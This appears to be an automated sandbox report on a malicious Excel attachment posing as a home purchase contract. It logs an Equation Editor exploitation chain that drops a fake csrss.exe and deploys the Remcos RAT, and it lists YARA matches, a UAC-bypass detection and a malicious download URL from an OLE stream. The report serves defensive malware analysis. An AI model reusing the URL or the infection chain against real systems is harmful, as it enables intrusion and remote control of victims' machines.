Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

8_2_33D567B9

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D9332B	8_2_33D9332B
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D7E2FB	8_2_33D7E2FB
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D861F0	8_2_33D861F0
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D73946	8_2_33D73946
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D7E0CC	8_2_33D7E0CC
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D76FEA	8_2_33D76FEA
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D7DE9D	8_2_33D7DE9D
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D75E5E	8_2_33D75E5E
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D7E558	8_2_33D7E558
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D5DB62	8_2_33D5DB62
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D57121	8_2_33D57121
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D570C2	8_2_33D570C2
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C720C4	11_2_02C720C4
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D256FEA	11_2_2D256FEA
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D246E0E	11_2_2D246E0E
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D25DE9D	11_2_2D25DE9D
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D253946	11_2_2D253946
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D23DB62	11_2_2D23DB62
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D247BAF	11_2_2D247BAF
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D247A46	11_2_2D247A46
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D258770	11_2_2D258770
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D274159	11_2_2D274159
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D2661F0	11_2_2D2661F0
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D23F0FA	11_2_2D23F0FA
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D27332B	11_2_2D27332B
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D24739D	11_2_2D24739D

Source: Home Purchase Contract and Property Details.xls

OLE indicator, VBA macros: true

Source: Home Purchase Contract and Property Details.xls

Stream path 'MBD00099101/\x1Ole' : http://qr-in.com/NAvSGzZ{Oj3)RXku>SI%5.xBI0Qkoh?oBdGa]dn{CwQ/lzIawQOWjk ~FG4|eK<:~c D!W6%L(3Y+UpmT|Z+MzH'YvCT|,kDfXwy:p0PzMhW6YXp3ixiWoRXXPqmQjkuFlUB0rZEYLONZNpkrrEQry1s7viSBC9qAGZcbSd6YSWt6skNTah80TV1OAnBjyYAV5iCjaD0Vvvu78SpMjdPoeeEGsxT51PsjFbZH0egg0ScOog0wHB76WhvSs1Bksop3d6wNw6oA90d3HmdHEafGfKALEuiPiEoXTjmOQ18lxNyMZVUKzBmla07E7Sj1KmS19X806a92Ab94RDIkrHfQ3Sh5shdI3u%me<fFiX+

Source: ~DF78F515A159E2AA69.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: String function: 33D74E10 appears 43 times
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: String function: 02C87DF4 appears 45 times
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: String function: 02C746A4 appears 244 times
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: String function: 02C76640 appears 37 times
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: String function: 02C7480C appears 771 times
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: String function: 02C87CA8 appears 49 times
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: String function: 02C744AC appears 69 times

Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winXLS@9/31@13/6

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D57952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

8_2_33D57952

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Code function: 11_2_02C77F4C GetDiskFreeSpaceA,

11_2_02C77F4C

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D4F8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

8_2_33D4F8FD

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Code function: 11_2_02C86D40 CoCreateInstance,

11_2_02C86D40

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D5B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

8_2_33D5B4A8

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,

8_2_33D5AB0D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UZ61X6P3.txt

Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-9VASLD

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR70AC.tmp

Jump to behavior

Source: Home Purchase Contract and Property Details.xls	OLE indicator, Workbook stream: true
Source: 0B430000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Users\user\AppData\Roaming\csrss.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe"
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF
Source: unknown	Process created: C:\Users\Public\Libraries\Efftwcmk.PIF "C:\Users\Public\Libraries\Efftwcmk.PIF"
Source: unknown	Process created: C:\Users\Public\Libraries\Efftwcmk.PIF "C:\Users\Public\Libraries\Efftwcmk.PIF"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Section loaded: ??.dll	Jump to behavior
